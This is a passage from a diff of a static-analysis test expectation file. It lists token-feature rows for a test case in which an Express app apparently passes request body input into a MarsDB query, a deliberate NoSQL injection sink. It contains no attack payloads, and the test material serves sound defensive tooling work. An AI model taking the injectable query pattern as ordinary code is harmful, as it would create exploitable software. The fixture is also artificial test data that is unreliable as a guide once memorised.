| express ... press") | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:1:17:1:23 | require | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:1:17:1:23 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:1:17:1:23 | require | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:1:17:1:34 | exceptional return of require("express") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:1:17:1:34 | exceptional return of require("express") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:1:17:1:34 | exceptional return of require("express") | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:1:17:1:34 | require("express") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:1:17:1:34 | require("express") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:1:17:1:34 | require("express") | fileImports | body-parser express marsdb | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:1:25:1:33 | "express" | CalleeFlexibleAccessPath | require | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:1:25:1:33 | "express" | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:1:25:1:33 | "express" | calleeImports | | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:1:25:1:33 | "express" | contextFunctionInterfaces | | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:1:25:1:33 | "express" | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:1:25:1:33 | "express" | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:2:3:2:8 | MarsDB | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:2:3:2:8 | MarsDB | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:2:3:2:8 | MarsDB | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:2:3:2:28 | MarsDB | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:2:3:2:28 | MarsDB | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:2:3:2:28 | MarsDB | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:2:3:2:28 | MarsDB ... arsdb") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:2:3:2:28 | MarsDB ... arsdb") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:2:3:2:28 | MarsDB ... arsdb") | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:2:12:2:18 | require | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:2:12:2:18 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:2:12:2:18 | require | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:2:12:2:28 | exceptional return of require("marsdb") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:2:12:2:28 | exceptional return of require("marsdb") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:2:12:2:28 | exceptional return of require("marsdb") | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:2:12:2:28 | require("marsdb") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:2:12:2:28 | require("marsdb") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:2:12:2:28 | require("marsdb") | fileImports | body-parser express marsdb | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:2:20:2:27 | "marsdb" | CalleeFlexibleAccessPath | require | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:2:20:2:27 | "marsdb" | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:2:20:2:27 | "marsdb" | calleeImports | | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:2:20:2:27 | "marsdb" | contextFunctionInterfaces | | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:2:20:2:27 | "marsdb" | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:2:20:2:27 | "marsdb" | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:3:3:3:12 | bodyParser | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:3:3:3:12 | bodyParser | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:3:3:3:12 | bodyParser | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:3:3:3:37 | bodyPar ... arser") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:3:3:3:37 | bodyPar ... arser") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:3:3:3:37 | bodyPar ... arser") | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:3:3:3:37 | bodyParser | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:3:3:3:37 | bodyParser | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:3:3:3:37 | bodyParser | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:3:16:3:22 | require | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:3:16:3:22 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:3:16:3:22 | require | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:3:16:3:37 | exceptional return of require ... arser") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:3:16:3:37 | exceptional return of require ... arser") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:3:16:3:37 | exceptional return of require ... arser") | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:3:16:3:37 | require ... arser") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:3:16:3:37 | require ... arser") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:3:16:3:37 | require ... arser") | fileImports | body-parser express marsdb | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:3:24:3:36 | "body-parser" | CalleeFlexibleAccessPath | require | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:3:24:3:36 | "body-parser" | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:3:24:3:36 | "body-parser" | calleeImports | | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:3:24:3:36 | "body-parser" | contextFunctionInterfaces | | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:3:24:3:36 | "body-parser" | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:3:24:3:36 | "body-parser" | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:5:5:5:7 | doc | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:5:5:5:7 | doc | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:5:5:5:7 | doc | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:5:5:5:7 | doc | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:5:5:5:40 | doc | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:5:5:5:40 | doc | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:5:5:5:40 | doc | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:5:5:5:40 | doc = n ... myDoc") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:5:5:5:40 | doc = n ... myDoc") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:5:5:5:40 | doc = n ... myDoc") | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:5:11:5:40 | exceptional return of new Mar ... myDoc") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:5:11:5:40 | exceptional return of new Mar ... myDoc") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:5:11:5:40 | exceptional return of new Mar ... myDoc") | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:5:11:5:40 | new Mar ... myDoc") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:5:11:5:40 | new Mar ... myDoc") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:5:11:5:40 | new Mar ... myDoc") | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:5:15:5:20 | MarsDB | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:5:15:5:20 | MarsDB | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:5:15:5:20 | MarsDB | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:5:15:5:31 | MarsDB.Collection | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:5:15:5:31 | MarsDB.Collection | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:5:15:5:31 | MarsDB.Collection | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:5:22:5:31 | Collection | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:5:22:5:31 | Collection | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:5:22:5:31 | Collection | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:5:33:5:39 | "myDoc" | CalleeFlexibleAccessPath | MarsDB.Collection | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:5:33:5:39 | "myDoc" | InputArgumentIndex | 0 | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:5:33:5:39 | "myDoc" | calleeImports | marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:5:33:5:39 | "myDoc" | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:5:33:5:39 | "myDoc" | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:5:33:5:39 | "myDoc" | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:7:7:7:9 | app | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:7:7:7:9 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:7:7:7:9 | app | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:7:7:7:21 | app | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:7:7:7:21 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:7:7:7:21 | app | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:7:7:7:21 | app = express() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:7:7:7:21 | app = express() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:7:7:7:21 | app = express() | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:7:13:7:19 | express | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:7:13:7:19 | express | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:7:13:7:19 | express | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:7:13:7:21 | exceptional return of express() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:7:13:7:21 | exceptional return of express() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:7:13:7:21 | exceptional return of express() | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:7:13:7:21 | express() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:7:13:7:21 | express() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:7:13:7:21 | express() | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:1:9:3 | app | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:1:9:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:1:9:3 | app | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:1:9:7 | app.use | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:1:9:7 | app.use | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:1:9:7 | app.use | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:1:9:50 | app.use ... rue })) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:1:9:50 | app.use ... rue })) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:1:9:50 | app.use ... rue })) | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:1:9:50 | exceptional return of app.use ... rue })) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:1:9:50 | exceptional return of app.use ... rue })) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:1:9:50 | exceptional return of app.use ... rue })) | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:5:9:7 | use | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:5:9:7 | use | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:5:9:7 | use | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:9:9:18 | bodyParser | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:9:9:18 | bodyParser | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:9:9:18 | bodyParser | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:9:9:29 | bodyPar ... encoded | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:9:9:29 | bodyPar ... encoded | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:9:9:29 | bodyPar ... encoded | fileImports | body-parser express marsdb | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:9:9:49 | bodyPar ... true }) | CalleeFlexibleAccessPath | app.use | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:9:9:49 | bodyPar ... true }) | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:9:9:49 | bodyPar ... true }) | calleeImports | express | @@ -1312,6 +7098,12 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:9:9:49 | bodyPar ... true }) | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:9:9:49 | bodyPar ... true }) | fileImports | body-parser express marsdb | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:9:9:49 | bodyPar ... true }) | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:9:9:49 | exceptional return of bodyPar ... true }) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:9:9:49 | exceptional return of bodyPar ... true }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:9:9:49 | exceptional return of bodyPar ... true }) | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:20:9:29 | urlencoded | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:20:9:29 | urlencoded | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:20:9:29 | urlencoded | fileImports | body-parser express marsdb | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:31:9:48 | { extended: true } | CalleeFlexibleAccessPath | bodyParser.urlencoded | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:31:9:48 | { extended: true } | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:31:9:48 | { extended: true } | calleeImports | body-parser | @@ -1319,6 +7111,15 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:31:9:48 | { extended: true } | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:31:9:48 | { extended: true } | fileImports | body-parser express marsdb | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:31:9:48 | { extended: true } | receiverName | bodyParser | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:33:9:40 | extended | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:33:9:40 | extended | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:33:9:40 | extended | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:33:9:46 | extended: true | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:33:9:46 | extended: true | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:33:9:46 | extended: true | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:33:9:46 | extended: true | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:33:9:46 | extended: true | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:33:9:46 | extended: true | fileImports | body-parser express marsdb | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:43:9:46 | true | CalleeFlexibleAccessPath | bodyParser.urlencoded | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:43:9:46 | true | InputAccessPathFromCallee | 0.extended | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:43:9:46 | true | InputArgumentIndex | 0 | @@ -1327,6 +7128,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:43:9:46 | true | contextFunctionInterfaces | | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:43:9:46 | true | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:9:43:9:46 | true | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:1:11:3 | app | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:1:11:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:1:11:3 | app | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:1:11:8 | app.post | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:1:11:8 | app.post | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:1:11:8 | app.post | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:1:17:2 | app.pos ... {});\\n}) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:1:17:2 | app.pos ... {});\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:1:17:2 | app.pos ... {});\\n}) | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:1:17:2 | exceptional return of app.pos ... {});\\n}) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:1:17:2 | exceptional return of app.pos ... {});\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:1:17:2 | exceptional return of app.pos ... {});\\n}) | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:5:11:8 | post | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:5:11:8 | post | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:5:11:8 | post | fileImports | body-parser express marsdb | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:10:11:26 | "/documents/find" | CalleeFlexibleAccessPath | app.post | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:10:11:26 | "/documents/find" | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:10:11:26 | "/documents/find" | calleeImports | express | @@ -1334,6 +7150,16 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:10:11:26 | "/documents/find" | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:10:11:26 | "/documents/find" | fileImports | body-parser express marsdb | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:10:11:26 | "/documents/find" | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:29:11:28 | doc | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:29:11:28 | doc | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:29:11:28 | doc | enclosingFunctionBody | req res query query title req body title doc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:29:11:28 | doc | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:29:11:28 | doc | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:29:17:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:29:17:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:29:17:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res query query title req body title doc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:29:17:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:29:17:1 | 'arguments' object of anonymous function | fileImports | body-parser express marsdb | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:29:17:1 | (req, r ... {});\\n} | CalleeFlexibleAccessPath | app.post | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:29:17:1 | (req, r ... {});\\n} | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:29:17:1 | (req, r ... {});\\n} | calleeImports | express | @@ -1341,11 +7167,122 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:29:17:1 | (req, r ... {});\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:29:17:1 | (req, r ... {});\\n} | fileImports | body-parser express marsdb | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:29:17:1 | (req, r ... {});\\n} | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:29:17:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:29:17:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:29:17:1 | exceptional return of anonymous function | enclosingFunctionBody | req res query query title req body title doc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:29:17:1 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:29:17:1 | exceptional return of anonymous function | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:29:17:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:29:17:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:29:17:1 | return of anonymous function | enclosingFunctionBody | req res query query title req body title doc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:29:17:1 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:29:17:1 | return of anonymous function | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:30:11:32 | req | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:30:11:32 | req | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:30:11:32 | req | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:30:11:32 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:30:11:32 | req | enclosingFunctionBody | req res query query title req body title doc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:30:11:32 | req | enclosingFunctionBody | req res query query title req body title doc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:30:11:32 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:30:11:32 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:30:11:32 | req | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:30:11:32 | req | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:35:11:37 | res | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:35:11:37 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:35:11:37 | res | enclosingFunctionBody | req res query query title req body title doc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:35:11:37 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:11:35:11:37 | res | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:12:9:12:13 | query | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:12:9:12:13 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:12:9:12:13 | query | enclosingFunctionBody | req res query query title req body title doc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:12:9:12:13 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:12:9:12:13 | query | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:12:9:12:18 | query | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:12:9:12:18 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:12:9:12:18 | query | enclosingFunctionBody | req res query 